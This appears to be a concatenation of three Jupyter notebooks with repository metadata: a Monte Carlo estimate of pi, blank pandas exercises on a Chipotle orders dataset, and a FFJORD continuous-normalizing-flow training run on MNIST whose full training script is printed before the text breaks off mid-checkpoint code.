e7071b4ede8b5d4af18ca47e217e9d74e503653a | 2,881 | ipynb | Jupyter Notebook | Pi approximation via Monte Carlo.ipynb | migueltorrescosta/tutor | a6918bee7a64b11c3a8059c6d85c6f4a9de6e104 | [
"MIT"
] | null | null | null | Pi approximation via Monte Carlo.ipynb | migueltorrescosta/tutor | a6918bee7a64b11c3a8059c6d85c6f4a9de6e104 | [
"MIT"
] | null | null | null | Pi approximation via Monte Carlo.ipynb | migueltorrescosta/tutor | a6918bee7a64b11c3a8059c6d85c6f4a9de6e104 | [
"MIT"
] | null | null | null | 21.825758 | 129 | 0.537313 | [
[
[
"# All imports",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
]
],
[
[
"# Aux functions",
"_____no_output_____"
]
],
[
[
"# Generates random points on the square x,y in [-1,1]\ndef sample_points(n):\n x_coordinates = list(map(lambda x:2*x-1,np.random.rand(n)))\n y_coordinates = list(map(lambda x:2*x-1,np.random.rand(n)))\n points = list(zip(x_coordinates,y_coordinates))\n return points\n\n# Returns true if a point is inside the unit circle\ndef valid_point(x):\n return x[0]**2 + x[1]**2 <= 1\n\n# Returns the percentage of points inside the unit circle\ndef percentage_of_valid_points(points):\n number_of_valid_points = sum(map(lambda x:valid_point(x),points))\n return number_of_valid_points*1./len(points)\n\n# Given a percentage p of points inside the circle, returns an approximation of PI\ndef pi_approximation(p):\n return 4*p\n\n# Runs the above functions in order\ndef pipeline(n):\n points = sample_points(n)\n p = percentage_of_valid_points(points)\n return pi_approximation(p)",
"_____no_output_____"
]
],
[
[
"# Defining variables",
"_____no_output_____"
]
],
[
[
"number_of_points = 10**7",
"_____no_output_____"
]
],
[
[
"# Running the script",
"_____no_output_____"
]
],
[
[
"pipeline(number_of_points)",
"_____no_output_____"
]
],
[
[
"### TODO: Plot the pi approximation as the number of samples increase (maybe use log scale for better view of the process).",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e7071c93adb9ae7cb794b07e69bd22dad9d52a68 | 6,012 | ipynb | Jupyter Notebook | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | CharlesMaponya/pandas_exercises | 58a21590d02c3af0bd854fb6f7f2b321439e6360 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | CharlesMaponya/pandas_exercises | 58a21590d02c3af0bd854fb6f7f2b321439e6360 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | CharlesMaponya/pandas_exercises | 58a21590d02c3af0bd854fb6f7f2b321439e6360 | [
"BSD-3-Clause"
] | null | null | null | 18.054054 | 135 | 0.498503 | [
[
[
"# Ex2 - Getting and Knowing your Data",
"_____no_output_____"
],
[
"This time we are going to pull data directly from the internet.\nSpecial thanks to: https://github.com/justmarkham for sharing the dataset and materials.\n\n### Step 1. Import the necessary libraries",
"_____no_output_____"
],
[
"### Step 2. Import the dataset from this [address](https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv). ",
"_____no_output_____"
],
[
"### Step 3. Assign it to a variable called chipo.",
"_____no_output_____"
],
[
"### Step 4. See the first 10 entries",
"_____no_output_____"
],
[
"### Step 5. What is the number of observations in the dataset?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n\n",
"_____no_output_____"
],
[
"# Solution 2\n\n",
"_____no_output_____"
]
],
[
[
"### Step 6. What is the number of columns in the dataset?",
"_____no_output_____"
],
[
"### Step 7. Print the name of all the columns.",
"_____no_output_____"
],
[
"### Step 8. How is the dataset indexed?",
"_____no_output_____"
],
[
"### Step 9. Which was the most-ordered item? ",
"_____no_output_____"
],
[
"### Step 10. For the most-ordered item, how many items were ordered?",
"_____no_output_____"
],
[
"### Step 11. What was the most ordered item in the choice_description column?",
"_____no_output_____"
],
[
"### Step 12. How many items were orderd in total?",
"_____no_output_____"
],
[
"### Step 13. Turn the item price into a float",
"_____no_output_____"
],
[
"#### Step 13.a. Check the item price type",
"_____no_output_____"
],
[
"#### Step 13.b. Create a lambda function and change the type of item price",
"_____no_output_____"
],
[
"#### Step 13.c. Check the item price type",
"_____no_output_____"
],
[
"### Step 14. How much was the revenue for the period in the dataset?",
"_____no_output_____"
],
[
"### Step 15. How many orders were made in the period?",
"_____no_output_____"
],
[
"### Step 16. What is the average revenue amount per order?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n\n",
"_____no_output_____"
],
[
"# Solution 2\n\n",
"_____no_output_____"
]
],
[
[
"### Step 17. How many different items are sold?",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e7071dc356689aaa367ca0ead65f6cf324acf130 | 737,247 | ipynb | Jupyter Notebook | unconditional/main_bs8K_errcontrol_7gpus_adaptive_run1.ipynb | minhtannguyen/ffjord | f3418249eaa4647f4339aea8d814cf2ce33be141 | [
"MIT"
] | null | null | null | unconditional/main_bs8K_errcontrol_7gpus_adaptive_run1.ipynb | minhtannguyen/ffjord | f3418249eaa4647f4339aea8d814cf2ce33be141 | [
"MIT"
] | null | null | null | unconditional/main_bs8K_errcontrol_7gpus_adaptive_run1.ipynb | minhtannguyen/ffjord | f3418249eaa4647f4339aea8d814cf2ce33be141 | [
"MIT"
] | null | null | null | 103.618693 | 2,034 | 0.545927 | [
[
[
"import os\nos.environ['CUDA_VISIBLE_DEVICES']='0,1,2,3,4,5,6'",
"_____no_output_____"
],
[
"# %run -p ../train_cnf_adaptive.py --data mnist --dims 64,64,64 --strides 1,1,1,1 --num_blocks 2 --layer_type concat --multiscale True --rademacher True --batch_size 900 --test_batch_size 5000 --save ../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1 --seed 0 --conditional False --controlled_tol True --lr 0.001 --warmup_iters 113 --atol 1e-4 --rtol 1e-4 --log_freq 11 --batch_size_schedule \"3-5-7-9-11-13-15-17-19-21\"\n# #",
"_____no_output_____"
],
[
"%run -p ../train_cnf.py --data mnist --dims 64,64,64 --strides 1,1,1,1 --num_blocks 2 --layer_type concat --multiscale True --rademacher True --batch_size 8000 --test_batch_size 5000 --save ../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1 --resume ../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1/epoch_400_checkpt.pth --seed 0 --conditional False --controlled_tol True --lr 0.0001 --warmup_iters 113 --atol 1e-4 --rtol 1e-4\n#",
"/tancode/repos/tan-ffjord/train_cnf.py\nimport argparse\nimport os\nimport time\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torchvision.datasets as dset\nimport torchvision.transforms as tforms\nfrom torchvision.utils import save_image\n\nimport lib.layers as layers\nimport lib.utils as utils\nimport lib.multiscale_parallel as multiscale_parallel\nimport lib.modules as modules\nimport lib.thops as thops\n\nfrom train_misc import standard_normal_logprob\nfrom train_misc import set_cnf_options, count_nfe, count_parameters, count_total_time\nfrom train_misc import add_spectral_norm, spectral_norm_power_iteration\nfrom train_misc import create_regularization_fns, get_regularization, append_regularization_to_log\n\nfrom tensorboardX import SummaryWriter\n\n# go fast boi!!\ntorch.backends.cudnn.benchmark = True\nSOLVERS = [\"dopri5\", \"bdf\", \"rk4\", \"midpoint\", 'adams', 'explicit_adams']\nparser = argparse.ArgumentParser(\"Continuous Normalizing Flow\")\nparser.add_argument(\"--data\", choices=[\"mnist\", \"svhn\", \"cifar10\", 'lsun_church'], type=str, default=\"mnist\")\nparser.add_argument(\"--dims\", type=str, default=\"8,32,32,8\")\nparser.add_argument(\"--strides\", type=str, default=\"2,2,1,-2,-2\")\nparser.add_argument(\"--num_blocks\", type=int, default=1, help='Number of stacked CNFs.')\n\nparser.add_argument(\"--conv\", type=eval, default=True, choices=[True, False])\nparser.add_argument(\n \"--layer_type\", type=str, default=\"ignore\",\n choices=[\"ignore\", \"concat\", \"concat_v2\", \"squash\", \"concatsquash\", \"concatcoord\", \"hyper\", \"blend\"]\n)\nparser.add_argument(\"--divergence_fn\", type=str, default=\"approximate\", choices=[\"brute_force\", \"approximate\"])\nparser.add_argument(\n \"--nonlinearity\", type=str, default=\"softplus\", choices=[\"tanh\", \"relu\", \"softplus\", \"elu\", \"swish\"]\n)\n\nparser.add_argument(\"--seed\", type=int, default=0)\n\nparser.add_argument('--solver', type=str, default='dopri5', choices=SOLVERS)\nparser.add_argument('--atol', type=float, default=1e-5)\nparser.add_argument('--rtol', type=float, default=1e-5)\nparser.add_argument(\"--step_size\", type=float, default=None, help=\"Optional fixed step size.\")\n\nparser.add_argument('--test_solver', type=str, default=None, choices=SOLVERS + [None])\nparser.add_argument('--test_atol', type=float, default=None)\nparser.add_argument('--test_rtol', type=float, default=None)\n\nparser.add_argument(\"--imagesize\", type=int, default=None)\nparser.add_argument(\"--alpha\", type=float, default=1e-6)\nparser.add_argument('--time_length', type=float, default=1.0)\nparser.add_argument('--train_T', type=eval, default=True)\n\nparser.add_argument(\"--num_epochs\", type=int, default=1000)\nparser.add_argument(\"--batch_size\", type=int, default=200)\nparser.add_argument(\n \"--batch_size_schedule\", type=str, default=\"\", help=\"Increases the batchsize at every given epoch, dash separated.\"\n)\nparser.add_argument(\"--test_batch_size\", type=int, default=200)\nparser.add_argument(\"--lr\", type=float, default=1e-3)\nparser.add_argument(\"--warmup_iters\", type=float, default=1000)\nparser.add_argument(\"--weight_decay\", type=float, default=0.0)\nparser.add_argument(\"--spectral_norm_niter\", type=int, default=10)\nparser.add_argument(\"--weight_y\", type=float, default=0.5)\n\nparser.add_argument(\"--add_noise\", type=eval, default=True, choices=[True, False])\nparser.add_argument(\"--batch_norm\", type=eval, default=False, choices=[True, False])\nparser.add_argument('--residual', type=eval, default=False, choices=[True, False])\nparser.add_argument('--autoencode', type=eval, default=False, choices=[True, False])\nparser.add_argument('--rademacher', type=eval, default=True, choices=[True, False])\nparser.add_argument('--spectral_norm', type=eval, default=False, choices=[True, False])\nparser.add_argument('--multiscale', type=eval, default=False, choices=[True, False])\nparser.add_argument('--parallel', type=eval, default=False, choices=[True, False])\nparser.add_argument('--conditional', type=eval, default=False, choices=[True, False])\nparser.add_argument('--controlled_tol', type=eval, default=False, choices=[True, False])\nparser.add_argument(\"--train_mode\", choices=[\"semisup\", \"sup\", \"unsup\"], type=str, default=\"semisup\")\n\n# Regularizations\nparser.add_argument('--l1int', type=float, default=None, help=\"int_t ||f||_1\")\nparser.add_argument('--l2int', type=float, default=None, help=\"int_t ||f||_2\")\nparser.add_argument('--dl2int', type=float, default=None, help=\"int_t ||f^T df/dt||_2\")\nparser.add_argument('--JFrobint', type=float, default=None, help=\"int_t ||df/dx||_F\")\nparser.add_argument('--JdiagFrobint', type=float, default=None, help=\"int_t ||df_i/dx_i||_F\")\nparser.add_argument('--JoffdiagFrobint', type=float, default=None, help=\"int_t ||df/dx - df_i/dx_i||_F\")\n\nparser.add_argument(\"--time_penalty\", type=float, default=0, help=\"Regularization on the end_time.\")\nparser.add_argument(\n \"--max_grad_norm\", type=float, default=1e10,\n help=\"Max norm of graidents (default is just stupidly high to avoid any clipping)\"\n)\n\nparser.add_argument(\"--begin_epoch\", type=int, default=1)\nparser.add_argument(\"--resume\", type=str, default=None)\nparser.add_argument(\"--save\", type=str, default=\"experiments/cnf\")\nparser.add_argument(\"--val_freq\", type=int, default=1)\nparser.add_argument(\"--log_freq\", type=int, default=1)\n\nargs = parser.parse_args()\n\nif args.controlled_tol:\n import lib.odenvp_conditional_tol as odenvp\nelse:\n import lib.odenvp_conditional as odenvp\n \n# set seed\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\n# logger\nutils.makedirs(args.save)\nlogger = utils.get_logger(logpath=os.path.join(args.save, 'logs'), filepath=os.path.abspath(__file__)) # write to log file\nwriter = SummaryWriter(os.path.join(args.save, 'tensorboard')) # write to tensorboard\n\nif args.layer_type == \"blend\":\n logger.info(\"!! Setting time_length from None to 1.0 due to use of Blend layers.\")\n args.time_length = 1.0\n\nlogger.info(args)\n\n\ndef add_noise(x):\n \"\"\"\n [0, 1] -> [0, 255] -> add noise -> [0, 1]\n \"\"\"\n if args.add_noise:\n noise = x.new().resize_as_(x).uniform_()\n x = x * 255 + noise\n x = x / 256\n return x\n\n\ndef update_lr(optimizer, itr):\n iter_frac = min(float(itr + 1) / max(args.warmup_iters, 1), 1.0)\n lr = args.lr * iter_frac\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\ndef get_train_loader(train_set, epoch):\n if args.batch_size_schedule != \"\":\n epochs = [0] + list(map(int, args.batch_size_schedule.split(\"-\")))\n n_passed = sum(np.array(epochs) <= epoch)\n current_batch_size = int(args.batch_size * n_passed)\n else:\n current_batch_size = args.batch_size\n train_loader = torch.utils.data.DataLoader(\n dataset=train_set, batch_size=current_batch_size, shuffle=True, drop_last=True, pin_memory=True\n )\n logger.info(\"===> Using batch size {}. Total {} iterations/epoch.\".format(current_batch_size, len(train_loader)))\n return train_loader\n\n\ndef get_dataset(args):\n trans = lambda im_size: tforms.Compose([tforms.Resize(im_size), tforms.ToTensor(), add_noise])\n\n if args.data == \"mnist\":\n im_dim = 1\n im_size = 28 if args.imagesize is None else args.imagesize\n train_set = dset.MNIST(root=\"../data\", train=True, transform=trans(im_size), download=True)\n test_set = dset.MNIST(root=\"../data\", train=False, transform=trans(im_size), download=True)\n elif args.data == \"svhn\":\n im_dim = 3\n im_size = 32 if args.imagesize is None else args.imagesize\n train_set = dset.SVHN(root=\"../data\", split=\"train\", transform=trans(im_size), download=True)\n test_set = dset.SVHN(root=\"../data\", split=\"test\", transform=trans(im_size), download=True)\n elif args.data == \"cifar10\":\n im_dim = 3\n im_size = 32 if args.imagesize is None else args.imagesize\n train_set = dset.CIFAR10(\n root=\"../data\", train=True, transform=tforms.Compose([\n tforms.Resize(im_size),\n tforms.RandomHorizontalFlip(),\n tforms.ToTensor(),\n add_noise,\n ]), download=True\n )\n test_set = dset.CIFAR10(root=\"../data\", train=False, transform=trans(im_size), download=True)\n elif args.data == 'celeba':\n im_dim = 3\n im_size = 64 if args.imagesize is None else args.imagesize\n train_set = dset.CelebA(\n train=True, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.RandomHorizontalFlip(),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n test_set = dset.CelebA(\n train=False, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n elif args.data == 'lsun_church':\n im_dim = 3\n im_size = 64 if args.imagesize is None else args.imagesize\n train_set = dset.LSUN(\n '../data', ['church_outdoor_train'], transform=tforms.Compose([\n tforms.Resize(96),\n tforms.RandomCrop(64),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n test_set = dset.LSUN(\n '../data', ['church_outdoor_val'], transform=tforms.Compose([\n tforms.Resize(96),\n tforms.RandomCrop(64),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n ) \n elif args.data == 'imagenet_64':\n im_dim = 3\n im_size = 64 if args.imagesize is None else args.imagesize\n train_set = dset.ImageFolder(\n train=True, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.RandomHorizontalFlip(),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n test_set = dset.ImageFolder(\n train=False, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n \n data_shape = (im_dim, im_size, im_size)\n if not args.conv:\n data_shape = (im_dim * im_size * im_size,)\n\n test_loader = torch.utils.data.DataLoader(\n dataset=test_set, batch_size=args.test_batch_size, shuffle=False, drop_last=True\n )\n return train_set, test_loader, data_shape\n\n\ndef compute_bits_per_dim(x, model):\n zero = torch.zeros(x.shape[0], 1).to(x)\n\n # Don't use data parallelize if batch size is small.\n # if x.shape[0] < 200:\n # model = model.module\n \n z, delta_logp = model(x, zero) # run model forward\n\n logpz = standard_normal_logprob(z).view(z.shape[0], -1).sum(1, keepdim=True) # logp(z)\n logpx = logpz - delta_logp\n\n logpx_per_dim = torch.sum(logpx) / x.nelement() # averaged over batches\n bits_per_dim = -(logpx_per_dim - np.log(256)) / np.log(2)\n\n return bits_per_dim\n\ndef compute_bits_per_dim_conditional(x, y, model):\n zero = torch.zeros(x.shape[0], 1).to(x)\n y_onehot = thops.onehot(y, num_classes=model.module.y_class).to(x)\n\n # Don't use data parallelize if batch size is small.\n # if x.shape[0] < 200:\n # model = model.module\n \n z, delta_logp = model(x, zero) # run model forward\n \n # prior\n mean, logs = model.module._prior(y_onehot)\n\n logpz = modules.GaussianDiag.logp(mean, logs, z).view(-1,1) # logp(z)\n logpx = logpz - delta_logp\n\n logpx_per_dim = torch.sum(logpx) / x.nelement() # averaged over batches\n bits_per_dim = -(logpx_per_dim - np.log(256)) / np.log(2)\n \n # compute xentropy loss\n y_logits = model.module.project_class(z)\n loss_xent = model.module.loss_class(y_logits, y.to(x.get_device()))\n y_predicted = np.argmax(y_logits.cpu().detach().numpy(), axis=1)\n\n return bits_per_dim, loss_xent, y_predicted\n\ndef create_model(args, data_shape, regularization_fns):\n hidden_dims = tuple(map(int, args.dims.split(\",\")))\n strides = tuple(map(int, args.strides.split(\",\")))\n\n if args.multiscale:\n model = odenvp.ODENVP(\n (args.batch_size, *data_shape),\n n_blocks=args.num_blocks,\n intermediate_dims=hidden_dims,\n nonlinearity=args.nonlinearity,\n alpha=args.alpha,\n cnf_kwargs={\"T\": args.time_length, \"train_T\": args.train_T, \"regularization_fns\": regularization_fns, \"solver\": args.solver, \"atol\": args.atol, \"rtol\": args.rtol},)\n elif args.parallel:\n model = multiscale_parallel.MultiscaleParallelCNF(\n (args.batch_size, *data_shape),\n n_blocks=args.num_blocks,\n intermediate_dims=hidden_dims,\n alpha=args.alpha,\n time_length=args.time_length,\n )\n else:\n if args.autoencode:\n\n def build_cnf():\n autoencoder_diffeq = layers.AutoencoderDiffEqNet(\n hidden_dims=hidden_dims,\n input_shape=data_shape,\n strides=strides,\n conv=args.conv,\n layer_type=args.layer_type,\n nonlinearity=args.nonlinearity,\n )\n odefunc = layers.AutoencoderODEfunc(\n autoencoder_diffeq=autoencoder_diffeq,\n divergence_fn=args.divergence_fn,\n residual=args.residual,\n rademacher=args.rademacher,\n )\n cnf = layers.CNF(\n odefunc=odefunc,\n T=args.time_length,\n regularization_fns=regularization_fns,\n solver=args.solver,\n )\n return cnf\n else:\n\n def build_cnf():\n diffeq = layers.ODEnet(\n hidden_dims=hidden_dims,\n input_shape=data_shape,\n strides=strides,\n conv=args.conv,\n layer_type=args.layer_type,\n nonlinearity=args.nonlinearity,\n )\n odefunc = layers.ODEfunc(\n diffeq=diffeq,\n divergence_fn=args.divergence_fn,\n residual=args.residual,\n rademacher=args.rademacher,\n )\n cnf = layers.CNF(\n odefunc=odefunc,\n T=args.time_length,\n train_T=args.train_T,\n regularization_fns=regularization_fns,\n solver=args.solver,\n )\n return cnf\n\n chain = [layers.LogitTransform(alpha=args.alpha)] if args.alpha > 0 else [layers.ZeroMeanTransform()]\n chain = chain + [build_cnf() for _ in range(args.num_blocks)]\n if args.batch_norm:\n chain.append(layers.MovingBatchNorm2d(data_shape[0]))\n model = layers.SequentialFlow(chain)\n return model\n\n\nif __name__ == \"__main__\":\n\n # get deivce\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n cvt = lambda x: x.type(torch.float32).to(device, non_blocking=True)\n\n # load dataset\n train_set, test_loader, data_shape = get_dataset(args)\n\n # build model\n regularization_fns, regularization_coeffs = create_regularization_fns(args)\n model = create_model(args, data_shape, regularization_fns)\n\n if args.spectral_norm: add_spectral_norm(model, logger)\n set_cnf_options(args, model)\n\n logger.info(model)\n logger.info(\"Number of trainable parameters: {}\".format(count_parameters(model)))\n \n writer.add_text('info', \"Number of trainable parameters: {}\".format(count_parameters(model)))\n\n # optimizer\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n \n # set initial iter\n itr = 1\n \n # set the meters\n time_epoch_meter = utils.RunningAverageMeter(0.97)\n time_meter = utils.RunningAverageMeter(0.97)\n loss_meter = utils.RunningAverageMeter(0.97) # track total loss\n nll_meter = utils.RunningAverageMeter(0.97) # track negative log-likelihood\n xent_meter = utils.RunningAverageMeter(0.97) # track xentropy score\n error_meter = utils.RunningAverageMeter(0.97) # track error score\n steps_meter = utils.RunningAverageMeter(0.97)\n grad_meter = utils.RunningAverageMeter(0.97)\n tt_meter = utils.RunningAverageMeter(0.97)\n\n # restore parameters\n if args.resume is not None:\n checkpt = torch.load(args.resume, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpt[\"state_dict\"])\n if \"optim_state_dict\" in checkpt.keys():\n optimizer.load_state_dict(checkpt[\"optim_state_dict\"])\n # Manually move optimizer state to device.\n for state in optimizer.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = cvt(v)\n args.begin_epoch = checkpt['epoch'] + 1\n itr = checkpt['iter'] + 1\n time_epoch_meter.set(checkpt['epoch_time_avg'])\n time_meter.set(checkpt['time_train'])\n loss_meter.set(checkpt['loss_train'])\n nll_meter.set(checkpt['bits_per_dim_train'])\n xent_meter.set(checkpt['xent_train'])\n error_meter.set(checkpt['error_train'])\n steps_meter.set(checkpt['nfe_train'])\n grad_meter.set(checkpt['grad_train'])\n tt_meter.set(checkpt['total_time_train'])\n\n if torch.cuda.is_available():\n model = torch.nn.DataParallel(model).cuda()\n\n # For visualization.\n if args.conditional:\n fixed_y = torch.from_numpy(np.arange(model.module.y_class)).repeat(model.module.y_class).type(torch.long).to(device, non_blocking=True)\n fixed_y_onehot = thops.onehot(fixed_y, num_classes=model.module.y_class)\n with torch.no_grad():\n mean, logs = model.module._prior(fixed_y_onehot)\n fixed_z = modules.GaussianDiag.sample(mean, logs)\n else:\n fixed_z = cvt(torch.randn(100, *data_shape))\n \n\n if args.spectral_norm and not args.resume: spectral_norm_power_iteration(model, 500)\n\n best_loss_nll = float(\"inf\")\n best_error_score = float(\"inf\")\n \n for epoch in range(args.begin_epoch, args.num_epochs + 1):\n start_epoch = time.time()\n model.train()\n train_loader = get_train_loader(train_set, epoch)\n for _, (x, y) in enumerate(train_loader):\n start = time.time()\n update_lr(optimizer, itr)\n optimizer.zero_grad()\n\n if not args.conv:\n x = x.view(x.shape[0], -1)\n\n # cast data and move to device\n x = cvt(x)\n \n # compute loss\n if args.conditional:\n loss_nll, loss_xent, y_predicted = compute_bits_per_dim_conditional(x, y, model)\n if args.train_mode == \"semisup\":\n loss = loss_nll + args.weight_y * loss_xent\n elif args.train_mode == \"sup\":\n loss = loss_xent\n elif args.train_mode == \"unsup\":\n loss = loss_nll\n else:\n raise ValueError('Choose supported train_mode: semisup, sup, unsup')\n error_score = 1. - np.mean(y_predicted.astype(int) == y.numpy()) \n \n else:\n loss = compute_bits_per_dim(x, model)\n loss_nll, loss_xent, error_score = loss, 0., 0.\n \n if regularization_coeffs:\n reg_states = get_regularization(model, regularization_coeffs)\n reg_loss = sum(\n reg_state * coeff for reg_state, coeff in zip(reg_states, regularization_coeffs) if coeff != 0\n )\n loss = loss + reg_loss\n total_time = count_total_time(model)\n loss = loss + total_time * args.time_penalty\n\n loss.backward()\n grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n\n optimizer.step()\n\n if args.spectral_norm: spectral_norm_power_iteration(model, args.spectral_norm_niter)\n \n time_meter.update(time.time() - start)\n loss_meter.update(loss.item())\n nll_meter.update(loss_nll.item())\n if args.conditional:\n xent_meter.update(loss_xent.item())\n else:\n xent_meter.update(loss_xent)\n error_meter.update(error_score)\n steps_meter.update(count_nfe(model))\n grad_meter.update(grad_norm)\n tt_meter.update(total_time)\n \n # write to tensorboard\n writer.add_scalars('time', {'train_iter': time_meter.val}, itr)\n writer.add_scalars('loss', {'train_iter': loss_meter.val}, itr)\n writer.add_scalars('bits_per_dim', {'train_iter': nll_meter.val}, itr)\n writer.add_scalars('xent', {'train_iter': xent_meter.val}, itr)\n writer.add_scalars('error', {'train_iter': error_meter.val}, itr)\n writer.add_scalars('nfe', {'train_iter': steps_meter.val}, itr)\n writer.add_scalars('grad', {'train_iter': grad_meter.val}, itr)\n writer.add_scalars('total_time', {'train_iter': tt_meter.val}, itr)\n\n if itr % args.log_freq == 0:\n log_message = (\n \"Iter {:04d} | Time {:.4f}({:.4f}) | Bit/dim {:.4f}({:.4f}) | Xent {:.4f}({:.4f}) | Loss {:.4f}({:.4f}) | Error {:.4f}({:.4f}) \"\n \"Steps {:.0f}({:.2f}) | Grad Norm {:.4f}({:.4f}) | Total Time {:.2f}({:.2f})\".format(\n itr, time_meter.val, time_meter.avg, nll_meter.val, nll_meter.avg, xent_meter.val, xent_meter.avg, loss_meter.val, loss_meter.avg, error_meter.val, error_meter.avg, steps_meter.val, steps_meter.avg, grad_meter.val, grad_meter.avg, tt_meter.val, tt_meter.avg\n )\n )\n if regularization_coeffs:\n log_message = append_regularization_to_log(log_message, regularization_fns, reg_states)\n logger.info(log_message)\n writer.add_text('info', log_message, itr)\n\n itr += 1\n \n # compute test loss\n model.eval()\n if epoch % args.val_freq == 0:\n with torch.no_grad():\n # write to tensorboard\n writer.add_scalars('time', {'train_epoch': time_meter.avg}, epoch)\n writer.add_scalars('loss', {'train_epoch': loss_meter.avg}, epoch)\n writer.add_scalars('bits_per_dim', {'train_epoch': nll_meter.avg}, epoch)\n writer.add_scalars('xent', {'train_epoch': xent_meter.avg}, epoch)\n writer.add_scalars('error', {'train_epoch': error_meter.avg}, epoch)\n writer.add_scalars('nfe', {'train_epoch': steps_meter.avg}, epoch)\n writer.add_scalars('grad', {'train_epoch': grad_meter.avg}, epoch)\n writer.add_scalars('total_time', {'train_epoch': tt_meter.avg}, epoch)\n \n start = time.time()\n logger.info(\"validating...\")\n writer.add_text('info', \"validating...\", epoch)\n losses_nll = []; losses_xent = []; losses = []\n total_correct = 0\n \n for (x, y) in test_loader:\n if not args.conv:\n x = x.view(x.shape[0], -1)\n x = cvt(x)\n if args.conditional:\n loss_nll, loss_xent, y_predicted = compute_bits_per_dim_conditional(x, y, model)\n if args.train_mode == \"semisup\":\n loss = loss_nll + args.weight_y * loss_xent\n elif args.train_mode == \"sup\":\n loss = loss_xent\n elif args.train_mode == \"unsup\":\n loss = loss_nll\n else:\n raise ValueError('Choose supported train_mode: semisup, sup, unsup')\n total_correct += np.sum(y_predicted.astype(int) == y.numpy())\n else:\n loss = compute_bits_per_dim(x, model)\n loss_nll, loss_xent = loss, 0.\n losses_nll.append(loss_nll.cpu().numpy()); losses.append(loss.cpu().numpy())\n if args.conditional: \n losses_xent.append(loss_xent.cpu().numpy())\n else:\n losses_xent.append(loss_xent)\n \n loss_nll = np.mean(losses_nll); loss_xent = np.mean(losses_xent); loss = np.mean(losses)\n error_score = 1. - total_correct / len(test_loader.dataset)\n time_epoch_meter.update(time.time() - start_epoch)\n \n # write to tensorboard\n test_time_spent = time.time() - start\n writer.add_scalars('time', {'validation': test_time_spent}, epoch)\n writer.add_scalars('epoch_time', {'validation': time_epoch_meter.val}, epoch)\n writer.add_scalars('bits_per_dim', {'validation': loss_nll}, epoch)\n writer.add_scalars('xent', {'validation': loss_xent}, epoch)\n writer.add_scalars('loss', {'validation': loss}, epoch)\n writer.add_scalars('error', {'validation': error_score}, epoch)\n \n log_message = \"Epoch {:04d} | Time {:.4f}, Epoch Time {:.4f}({:.4f}), Bit/dim {:.4f}(best: {:.4f}), Xent {:.4f}, Loss {:.4f}, Error {:.4f}(best: {:.4f})\".format(epoch, time.time() - start, time_epoch_meter.val, time_epoch_meter.avg, loss_nll, best_loss_nll, loss_xent, loss, error_score, best_error_score)\n logger.info(log_message)\n writer.add_text('info', log_message, epoch)\n \n for name, param in model.named_parameters():\n writer.add_histogram(name, param.clone().cpu().data.numpy(), epoch)\n \n \n utils.makedirs(args.save)\n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"epoch_%i_checkpt.pth\"%epoch))\n \n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n 